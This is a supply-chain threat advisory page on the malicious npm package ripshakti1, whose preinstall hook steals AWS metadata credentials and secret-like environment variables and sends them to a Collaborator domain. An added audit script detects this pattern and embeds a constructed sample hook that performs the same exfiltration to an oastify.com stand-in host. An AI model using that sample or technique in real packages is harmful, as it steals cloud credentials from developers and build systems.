Supply-chain threat intelligence

Incident detail

critical · npm · credential theft · osv

Malicious code in ripshakti1 (npm)

ripshakti1

Risk score

92

AI summary

Indexed incident for ripshakti1 (npm).

Description

package.json declares a preinstall lifecycle hook (node index.js) that auto-executes on npm install. index.js queries the AWS EC2 instance metadata service (IMDSv2 and v1) at 169.254.169.254 for IAM role credentials, instance identity, user-data, and network/host metadata, queries the ECS task credentials endpoint at 169.254.170.2, and filters process.env for keys matching secret-shaped patterns (key, secret, token, pass, auth, cred, api, aws, database, db_, mongo, redis, s3, sqs, sns, lambda, role). Each payload is base64-encoded and exfiltrated via HTTPS GET to the attacker-controlled Burp Collaborator subdomain a2de2lw03amqkgbex432znqb72du1kp9.oastify.com. The hook fires on every install, including transitive installs and CI runners.
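As an added example (not code from the advisory, the package, or ThreatPkg), the following static audit flags the pattern described above: a lifecycle hook whose script references cloud credential endpoints, enumerates process.env, base64-encodes data, or calls back to a Collaborator domain. The manifest and hook script it inspects are constructed stand-ins; the names `auditPackage`, `RULES` and `readScript` are this example's own.

```javascript
// Added example: static audit of an npm package's lifecycle hooks for the
// credential-theft pattern described in the advisory. Sample manifest and hook
// script below are constructed stand-ins, not the real package's files.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Each rule is a literal-string heuristic over the hook script's source.
const RULES = [
  { id: "imds",            re: /169\.254\.169\.254/ },            // EC2 instance metadata
  { id: "ecs-credentials", re: /169\.254\.170\.2/ },              // ECS task credentials
  { id: "env-enumeration", re: /Object\.keys\(process\.env\)/ },  // harvests all env names
  { id: "base64-encode",   re: /toString\(["']base64["']\)/ },    // payload encoding
  { id: "oast-callback",   re: /\.oastify\.com/ },                // Burp Collaborator domain
];

// Audit every lifecycle hook: resolve "node <file>" to its source via readScript,
// otherwise inspect the command line itself. Returns one finding per hook present.
function auditPackage(manifest, readScript) {
  const scripts = manifest.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    const m = /\bnode\s+(\S+\.js)/.exec(cmd);
    const src = m ? readScript(m[1]) : cmd;
    const indicators = RULES.filter((r) => r.re.test(src)).map((r) => r.id);
    findings.push({ hook, command: cmd, indicators });
  }
  return findings;
}

// Constructed manifest and hook script mirroring the advisory's shape.
const SAMPLE_MANIFEST = {
  name: "example-pkg", // placeholder, not the real package name
  version: "0.0.0",
  scripts: { preinstall: "node index.js", test: "node test.js" },
};
const SAMPLE_SCRIPTS = {
  "index.js": `
fetch("http://169.254.169.254/latest/meta-data/iam/security-credentials/");
fetch("http://169.254.170.2" + process.env.AWS_CONTAINER_CREDENTIALS_RELATIVE_URI);
const env = Object.keys(process.env).filter((k) => /key|secret|token|pass/i.test(k));
const blob = Buffer.from(JSON.stringify(env)).toString("base64");
fetch("https://" + blob + ".example.oastify.com/");
`,
};

const findings = auditPackage(SAMPLE_MANIFEST, (file) => SAMPLE_SCRIPTS[file] || "");
console.log(JSON.stringify(findings, null, 2));
```

For a real package directory, pass a `readScript` that does `fs.readFileSync(path.join(pkgDir, file), "utf8")`; these literal-string rules catch the unobfuscated form only, so pair the audit with `npm ci --ignore-scripts` in CI and an egress block on 169.254.169.254 from build runners.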

The OpenSSF Package Analysis project identified 'ripshakti1' @ 81.0.0 (npm) as malicious.

It is considered malicious because:

  • The package communicates with a domain associated with malicious activity.

Technical details

Affected versions

=81.0.0

Indicators

  • affected version: =81.0.0 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents